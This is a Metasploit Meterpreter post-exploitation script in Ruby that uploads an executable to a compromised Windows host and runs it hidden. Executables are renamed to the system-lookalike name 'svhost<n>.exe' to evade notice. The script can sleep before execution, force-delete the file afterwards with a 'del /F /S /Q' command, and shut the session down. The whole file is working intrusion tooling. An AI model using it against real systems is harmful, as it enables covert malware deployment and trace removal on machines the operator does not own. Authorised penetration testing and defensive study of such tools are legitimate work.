scripts/meterpreter/uploadexec.rb
##
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
# If you'd like to improve this script, please try to port it as a post
# module instead. Thank you.
##
session = client
@@exec_opts = Rex::Parser::Arguments.new(
"-h" => [ false,"Help menu." ],
"-e" => [ true, "Executable or script to upload to target host." ],
"-o" => [ true, "Options for executable." ],
"-p" => [ false,"Path on target to upload executable, default is %TEMP%." ],
"-x" => [ false,"Exit the session once the payload has been run." ],
"-s" => [ true,"Sleep for a number of seconds after uploading before executing." ],
"-v" => [ false,"Verbose, return output of execution of uploaded executable." ],
"-r" => [ false,"Remove the executable after running it (only works if the executable exits right away)" ]
)
################## function declaration Declarations ##################
def usage()
print_line "UploadExec -- upload a script or executable and run it"
print_line(@@exec_opts.usage)
raise Rex::Script::Completed
end
def upload(session,file,trgloc = "")
if not ::File.exist?(file)
raise "File to Upload does not exist!"
else
if trgloc == ""
location = session.sys.config.getenv('TEMP')
else
location = trgloc
end
begin
ext = file[file.rindex(".") .. -1]
if ext and ext.downcase == ".exe"
fileontrgt = "#{location}\\svhost#{rand(100)}.exe"
else
fileontrgt = "#{location}\\TMP#{rand(100)}#{ext}"
end
print_status("\tUploading #{file}....")
session.fs.file.upload_file("#{fileontrgt}","#{file}")
print_status("\t#{file} uploaded!")
print_status("\tUploaded as #{fileontrgt}")
rescue ::Exception => e
print_status("Error uploading file #{file}: #{e.class} #{e}")
raise e
end
end
return fileontrgt
end
#Function for executing a list of commands
def cmd_on_trgt_exec(session,cmdexe,opt,verbose)
r=''
session.response_timeout=120
if verbose == 1
begin
print_status "\tRunning command #{cmdexe}"
r = session.sys.process.execute(cmdexe, opt, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
print_status("\t#{d}")
end
r.channel.close
r.close
rescue ::Exception => e
print_status("Error Running Command #{cmdexe}: #{e.class} #{e}")
raise e
end
else
begin
print_status "\trunning command #{cmdexe}"
r = session.sys.process.execute(cmdexe, opt, {'Hidden' => true, 'Channelized' => false})
r.close
rescue ::Exception => e
print_status("Error Running Command #{cmdexe}: #{e.class} #{e}")
raise e
end
end
end
def m_unlink(session, path)
r = session.sys.process.execute("cmd.exe /c del /F /S /Q " + path, nil, {'Hidden' => 'true'})
while(r.name)
select(nil, nil, nil, 0.10)
end
r.close
end
#check for proper Meterpreter Platform
def unsupported
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end
unsupported if client.platform != 'windows'
#parsing of Options
file = ""
cmdopt = nil
helpcall = 0
path = ""
verbose = 0
remove = 0
quit = 0
sleep_sec = nil
@@exec_opts.parse(args) { |opt, idx, val|
case opt
when "-e"
file = val || ""
when "-o"
cmdopt = val
when "-p"
path = val
when "-v"
verbose = 1
when "-h"
helpcall = 1
when "-s"
sleep_sec = val.to_f
when "-r"
remove = 1
when "-x"
quit = 1
end
}
if args.length == 0 || helpcall == 1
usage
end
print_status("Running Upload and Execute Meterpreter script....")
exec = upload(session,file,path)
if sleep_sec
print_status("\tSleeping for #{sleep_sec}s...")
Rex.sleep(sleep_sec)
end
cmd_on_trgt_exec(session,exec,cmdopt,verbose)
if remove == 1
print_status("\tDeleting #{exec}")
m_unlink(session, exec)
end
if quit == 1
print_status("Closing the session...")
session.core.shutdown rescue nil
session.shutdown_passive_dispatcher
end
print_status("Finished!")